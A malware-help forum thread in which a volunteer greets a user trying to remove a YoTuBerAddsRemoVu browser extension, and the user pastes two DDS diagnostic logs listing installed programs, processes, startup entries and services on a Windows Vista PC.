Jump to content

Can't Remove YoTuBerAddsRemoVu Extension from Browsers

alancarrr1
 Share

Recommended Posts

Maniac

Maniac

Posted
Posted

Hello alancarrr1 and :welcome:! My name is Borislav and I will be glad to help you solve your malware problem.

Please note:

  • If you are a paying customer, you have the privilege to contact the help desk at Consumer Support. If you choose this option to get help, please let me know.
  • I recommend you to keep the instructions I will be giving you so that they are available to you at any time. You can save them in a text file or print them.
  • Make sure you read all of the instructions and fixes thoroughly before continuing with them.
  • Follow my instructions strictly and don’t hesitate to stop and ask me if you have any questions.
  • Post your log files, don't attach them. Every log file should be copy/pasted in your next reply.
  • Do not perform any kind of scanning and fixing without my instructions. If you want to proceed on your own, please let me know.
Please follow the instructions here and then post your log files in a new reply in this thread:

http://forums.malwarebytes.org/index.php?showtopic=9573

Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Hi Borislav,

 

Thanks for your reply.

 

Below is the contents of the two files:

 

ATTACH.txt

 

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium 
Boot Device: \Device\HarddiskVolume1
Install Date: 25/03/2011 12:58:04
System Uptime: 21/03/2014 11:13:41 (56 hours ago)
.
Motherboard: OEM_MB |  | Acacia
Processor: AMD Phenom 8250e Triple-Core Processor | Socket AM2  | 1900/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 452 GiB total, 248.951 GiB free.
D: is FIXED (NTFS) - 14 GiB total, 1.916 GiB free.
E: is CDROM ()
F: is Removable
G: is Removable
H: is Removable
I: is Removable
J: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP788: 11/03/2014 01:39:27 - Scheduled Checkpoint
RP789: 12/03/2014 01:10:44 - Scheduled Checkpoint
RP790: 13/03/2014 00:37:37 - Scheduled Checkpoint
RP791: 13/03/2014 20:52:39 - Installed Java 7 Update 51
RP792: 14/03/2014 03:00:31 - Windows Update
RP793: 14/03/2014 16:18:46 - Removed Skype™ 6.14
RP794: 14/03/2014 16:25:56 - Removed Skype Click to Call
RP795: 14/03/2014 16:26:43 - Removed Skype Click to Call
RP796: 14/03/2014 16:28:51 - Removed Visual Studio 2008 x64 Redistributables
RP797: 14/03/2014 16:29:08 - Removed Visual Studio 2008 x64 Redistributables
RP798: 14/03/2014 16:30:21 - Removed Bonjour
RP799: 14/03/2014 16:31:05 - Removed Camtasia Studio 6
RP800: 15/03/2014 17:53:50 - Scheduled Checkpoint
RP801: 17/03/2014 01:05:42 - Scheduled Checkpoint
RP802: 18/03/2014 00:51:48 - Scheduled Checkpoint
RP803: 18/03/2014 05:44:33 - Windows Update
RP804: 19/03/2014 00:00:06 - Scheduled Checkpoint
RP805: 19/03/2014 03:00:12 - Windows Update
RP806: 20/03/2014 04:03:47 - Scheduled Checkpoint
RP807: 21/03/2014 00:33:38 - Revo Uninstaller's restore point - Network Acceleration
RP808: 21/03/2014 00:38:27 - Revo Uninstaller's restore point - Adobe AIR
RP809: 21/03/2014 00:40:09 - Revo Uninstaller's restore point - ConTEXT v0.98.6
RP810: 21/03/2014 00:45:03 - Revo Uninstaller's restore point - firstobject XML Editor version 2.4.2
RP811: 21/03/2014 00:46:11 - Revo Uninstaller's restore point - MainConcept MPEG2 Software Encoder_x64
RP812: 21/03/2014 00:47:00 - Removed MainConcept MPEG2 Software Encoder_x64
RP813: 21/03/2014 00:47:56 - Revo Uninstaller's restore point - DVD Play BD
RP814: 21/03/2014 01:01:40 - Revo Uninstaller's restore point - muvee autoProducer 6.1
RP815: 21/03/2014 01:03:17 - Removed muvee autoProducer 6.1
RP816: 21/03/2014 02:17:45 - Revo Uninstaller's restore point - Adobe Reader X (10.1.9)
RP817: 21/03/2014 02:22:23 - Revo Uninstaller's restore point - Java 7 Update 51
RP818: 21/03/2014 02:22:35 - Removed Java 7 Update 51
RP819: 21/03/2014 17:00:18 - Scheduled Checkpoint
.
==== Installed Programs ======================
.
Adobe Bridge 1.0
Adobe Common File Installer
Adobe Download Assistant
Adobe Flash Player 12 Plugin
Adobe Flash Player ActiveX
Adobe Help Center 1.0
Adobe Help Manager
Adobe Photoshop CS2
Adobe Shockwave Player 12.0
Adobe Stock Photos 1.0
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Audacity 2.0.5
Cards_Calendar_OrderGift_DoMorePlugout
Compatibility Pack for the 2007 Office system
CyberLink DVD Suite Deluxe
Enhanced Multimedia Keyboard Solution
FileZilla Client 3.7.0.2
Google Chrome
Google Update Helper
Hardware Diagnostic Tools
Hewlett-Packard Active Check for Health Check
Hewlett-Packard Asset Agent for Health Check
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
HP Active Support Library
HP Customer Experience Enhancements
HP Customer Feedback
HP Demo
HP Easy Setup - Frontend
HP On-Screen Cap/Num/Scroll Lock Indicator
HP Photosmart Essential 2.5
HP Photosmart Essential 3.0
HP Picasso Media Center Add-In
HP Recovery Manager RSS
HP Total Care Advisor
HP Update
HPPhotoSmartPhotobookWebPack1
HTML5 Video Player
iTunes
Java 7 Update 21 (64-bit)
LabelPrint
LightScribe System Software  1.14.17.1
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4.5.1
Microsoft Corporation
Microsoft LifeCam
Microsoft Office 2007 Service Pack 3 (SP3)
Microsoft Office Access MUI (English) 2007
Microsoft Office Access Setup Metadata MUI (English) 2007
Microsoft Office Enterprise 2007
Microsoft Office Excel MUI (English) 2007
Microsoft Office File Validation Add-In
Microsoft Office Groove MUI (English) 2007
Microsoft Office Groove Setup Metadata MUI (English) 2007
Microsoft Office InfoPath MUI (English) 2007
Microsoft Office Office 64-bit Components 2007
Microsoft Office OneNote MUI (English) 2007
Microsoft Office Outlook MUI (English) 2007
Microsoft Office PowerPoint MUI (English) 2007
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Proof (English) 2007
Microsoft Office Proof (French) 2007
Microsoft Office Proof (Spanish) 2007
Microsoft Office Proofing (English) 2007
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
Microsoft Office Publisher MUI (English) 2007
Microsoft Office Shared 64-bit MUI (English) 2007
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007
Microsoft Office Shared MUI (English) 2007
Microsoft Office Shared Setup Metadata MUI (English) 2007
Microsoft Office Word MUI (English) 2007
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
Microsoft Works
Microsoft_VC80_CRT_x86
Microsoft_VC90_CRT_x86
Mozilla Firefox 27.0.1 (x86 en-US)
Mozilla Maintenance Service
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MySQL Server 5.0
Notepad++
NVIDIA Drivers
Opera 12.14
Power2Go
PowerDirector
PSSWCORE
Python 2.5.2
QuickTime
Realtek High Definition Audio Driver
Revo Uninstaller 1.95
Safari
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft Office 2007 suites (KB2596744) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2596754) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2596792) 32-Bit Edition
Security Update for Microsoft Office 2007 suites (KB2596825) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2596871) 32-Bit Edition
Security Update for Microsoft Office 2007 suites (KB2597969) 32-Bit Edition
Security Update for Microsoft Office 2007 suites (KB2597973) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2687439) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760411) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760415) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760585) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760591) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2817641) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2827326) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2837615) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2850022) 32-Bit Edition 
Security Update for Microsoft Office Excel 2007 (KB2827324) 32-Bit Edition 
Security Update for Microsoft Office InfoPath 2007 (KB2687440) 32-Bit Edition 
Security Update for Microsoft Office Outlook 2007 (KB2825644) 32-Bit Edition 
Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition
Security Update for Microsoft Office PowerPoint 2007 (KB2596912) 32-Bit Edition
Security Update for Microsoft Office Publisher 2007 (KB2597971) 32-Bit Edition 
Security Update for Microsoft Office Word 2007 (KB2837617) 32-Bit Edition 
Skype™ 6.14
swMSM
Tracker
Update for 2007 Microsoft Office System (KB967642)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft Office 2007 Help for Common Features (KB963673)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition
Update for Microsoft Office 2007 suites (KB2687493) 32-Bit Edition
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition
Update for Microsoft Office Access 2007 Help (KB963663)
Update for Microsoft Office Excel 2007 Help (KB963678)
Update for Microsoft Office Infopath 2007 Help (KB963662)
Update for Microsoft Office OneNote 2007 Help (KB963670)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition
Update for Microsoft Office Outlook 2007 Help (KB963677)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2878234) 32-Bit Edition
Update for Microsoft Office Powerpoint 2007 Help (KB963669)
Update for Microsoft Office Publisher 2007 Help (KB963667)
Update for Microsoft Office Script Editor Help (KB963671)
Update for Microsoft Office Word 2007 Help (KB963665)
VideoToolkit01
WinRAR 5.01 (64-bit)
WinSCP 5.1.4
ZTE USB Driver
.
==== Event Viewer Messages From Past Week ========
.
21/03/2014 11:15:45, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  i8042prt
21/03/2014 11:15:45, Error: Service Control Manager [7000]  - The MySQL56 service failed to start due to the following error:  The system cannot find the path specified.
21/03/2014 11:15:45, Error: Service Control Manager [7000]  - The LogMeIn Kernel Information Provider service failed to start due to the following error:  The system cannot find the path specified.
21/03/2014 10:57:15, Error: Microsoft-Windows-WindowsUpdateClient [20]  - Installation Failure: Windows failed to install the following update with error 0x80070643: Definition Update for Windows Defender - KB915597 (Definition 1.169.394.0).
21/03/2014 02:19:46, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Windows Search service to connect.
21/03/2014 02:19:46, Error: Service Control Manager [7000]  - The Windows Search service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
21/03/2014 02:19:46, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1053" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
21/03/2014 02:05:37, Error: Service Control Manager [7030]  - The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
21/03/2014 01:57:39, Error: Service Control Manager [7034]  - The MySQL service terminated unexpectedly.  It has done this 1 time(s).
21/03/2014 01:48:45, Error: Service Control Manager [7034]  - The Easybits Shared Services for Windows service terminated unexpectedly.  It has done this 1 time(s).
.
==== End Of File ===========================
 
 
DDS.txt
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 9.0.8112.16540
Run by Alan at 19:43:08 on 2014-03-23
Microsoft® Windows Vista™ Home Premium   6.0.6002.2.1252.44.1033.18.3966.1345 [GMT 0:00]
.
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\rundll32.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Windows\SysWOW64\svchost.exe -k netsvcs
c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
C:\Windows\system32\lxdwcoms.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Microsoft LifeCam\MSCamS64.exe
C:\Program Files (x86)\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\PrintCtrl.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\PrintDisp.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Windows\ehome\ehmsas.exe
C:\hp\support\hpsysdrv.exe
C:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\hp\kbd\kbd.exe
c:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Adobe\Adobe Photoshop CS2\Photoshop.exe
C:\Users\Alan\AppData\Local\Temp\Adobelm_Cleanup.0001
C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
C:\Users\Alan\AppData\Local\Temp\Adobelm_Cleanup.0001
C:\Windows\splwow64.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Internet Explorer\IELowutil.exe
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Program Files (x86)\FileZilla FTP Client\filezilla.exe
C:\Windows\System32\mobsync.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uProxyServer = localhost:8080
uRun: [sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [HPAdvisor] C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe autorun=AUTORUN
uRun: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
mRun: [hpsysdrv] c:\hp\support\hpsysdrv.exe
mRun: [KBD] C:\HP\KBD\KbdStub.EXE
mRun: [OsdMaestro] c:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe
mRun: [HP Health Check Scheduler] c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
mRun: [HP Software Update] c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [LifeCam] "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
mRunOnce: [AvgUninstallURL] cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-appf?lic=NFVIMlctM1NYM0UtR0hHWDktQUZISjMtUFcyUU4tWjlLSDQ"&"inst=NzctMTcxMjQyMzM4Ni1MSUMrMTEtU1AxKzEtU1VEKzEtUzFJKzEtU1UzKzEtRkwxMCsxLVNUMTBGQVBQKzEtRERUKzAtRjEwTTEyUisxLVZJUDEyKzEtRjEwTTEyUjIrMS1DSUQxMCsxLUNJRCsxMA"&"prod=90"&"ver=10.0.1432
dRunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect"
StartupFolder: C:\Users\Alan\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ADOBEG~1.LNK - C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
StartupFolder: C:\Users\Alan\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Tracker.lnk - C:\Program Files (x86)\Tracker\Tracker.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{20DD8DB8-06EA-4D40-A3CC-B974B24382EB} : DHCPNameServer = 192.168.1.254
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\32.0.1700.107\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\System32\NvCpl.dll,NvStartup
x64-Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\System32\NvMcTray.dll,NvTaskbarInit
x64-Run: [PrintDisp] C:\Windows\System32\PrintDisp.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: keyword.URL - 
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrlui.dll
FF - plugin: C:\Users\Alan\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll
.
============= SERVICES / DRIVERS ===============
.
R2 ezSharedSvc;Easybits Shared Services for Windows;C:\Windows\System32\svchost.exe -k netsvcs [2008-1-21 27648]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-21 27648]
R2 LMIRfsDriver;LogMeIn Remote File System Driver;C:\Windows\System32\drivers\LMIRfsDriver.sys [2013-6-20 72216]
R2 lxdw_device;lxdw_device;C:\Windows\System32\lxdwcoms.exe -service --> C:\Windows\System32\lxdwcoms.exe -service [?]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [2014-2-18 418376]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2014-2-18 701512]
R2 Printer Control;Printer Control;C:\Windows\System32\PrintCtrl.exe [2013-12-20 121856]
R3 3xHybr64;ASUSTek SAA713x PCI Card;C:\Windows\System32\drivers\3xHybr64.sys [2007-1-26 3110656]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2011-3-25 25928]
R3 MSHUSBVideo;NX6000/NX3000/VX2000/VX5000/VX5500/VX7000/Cinema Filter Driver;C:\Windows\System32\drivers\nx6000.sys [2010-12-13 36720]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 MySQL56;MySQL56;"C:/Program Files/MySQL/MySQL Server 5.6/bin\mysqld" --defaults-file="C:\ProgramData\MySQL\MySQL Server 5.6\my.ini" MySQL56 --> C:/Program Files/MySQL/MySQL Server 5.6/bin\mysqld [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 massfilter;ZTE Mass Storage Filter Driver;C:\Windows\System32\drivers\massfilter.sys [2012-9-5 11776]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2012-9-10 22528]
S3 PerfHost;Performance Counter DLL Host;C:\WINDOWS\SysWOW64\perfhost.exe [2008-1-21 19968]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2013-9-11 1012344]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\WINDOWS\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2011-3-29 89920]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %* [userChoice]
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M  ====================
.
2014-03-21 02:51:51 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-03-19 03:01:02 90015360 ----a-w- C:\Windows\System32\mrt.exe
2014-03-12 04:34:52 71048 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-03-12 04:34:52 692616 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-02-23 07:12:29 17847808 ----a-w- C:\Windows\System32\mshtml.dll
2014-02-23 06:54:58 2334720 ----a-w- C:\Windows\System32\jscript9.dll
2014-02-23 06:52:45 10926592 ----a-w- C:\Windows\System32\ieframe.dll
2014-02-23 06:48:43 1347072 ----a-w- C:\Windows\System32\urlmon.dll
2014-02-23 06:48:31 1392128 ----a-w- C:\Windows\System32\wininet.dll
2014-02-23 06:46:42 1494528 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-02-23 06:46:20 237056 ----a-w- C:\Windows\System32\url.dll
2014-02-23 06:46:08 86016 ----a-w- C:\Windows\System32\jsproxy.dll
2014-02-23 06:45:36 173056 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-02-23 06:45:32 816640 ----a-w- C:\Windows\System32\jscript.dll
2014-02-23 06:45:27 599040 ----a-w- C:\Windows\System32\vbscript.dll
2014-02-23 06:44:57 729088 ----a-w- C:\Windows\System32\msfeeds.dll
2014-02-23 06:44:57 2147840 ----a-w- C:\Windows\System32\iertutil.dll
2014-02-23 06:44:14 96768 ----a-w- C:\Windows\System32\mshtmled.dll
2014-02-23 06:44:02 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2014-02-23 06:43:22 248320 ----a-w- C:\Windows\System32\ieui.dll
2014-02-23 05:50:22 12347904 ----a-w- C:\Windows\SysWow64\mshtml.dll
2014-02-23 05:47:19 1806848 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-02-23 05:43:55 9739264 ----a-w- C:\Windows\SysWow64\ieframe.dll
2014-02-23 05:41:03 1105408 ----a-w- C:\Windows\SysWow64\urlmon.dll
2014-02-23 05:40:18 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-02-23 05:39:28 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-02-23 05:38:15 231936 ----a-w- C:\Windows\SysWow64\url.dll
2014-02-23 05:38:08 65536 ----a-w- C:\Windows\SysWow64\jsproxy.dll
2014-02-23 05:38:08 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-02-23 05:37:49 421376 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-02-23 05:37:28 717824 ----a-w- C:\Windows\SysWow64\jscript.dll
2014-02-23 05:37:12 607744 ----a-w- C:\Windows\SysWow64\msfeeds.dll
2014-02-23 05:37:09 1796096 ----a-w- C:\Windows\SysWow64\iertutil.dll
2014-02-23 05:36:31 73216 ----a-w- C:\Windows\SysWow64\mshtmled.dll
2014-02-23 05:36:22 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-02-23 05:35:49 176640 ----a-w- C:\Windows\SysWow64\ieui.dll
2014-02-07 12:11:49 2776064 ----a-w- C:\Windows\System32\win32k.sys
2014-02-03 13:20:59 619008 ----a-w- C:\Windows\System32\qedit.dll
2014-02-03 10:37:54 505344 ----a-w- C:\Windows\SysWow64\qedit.dll
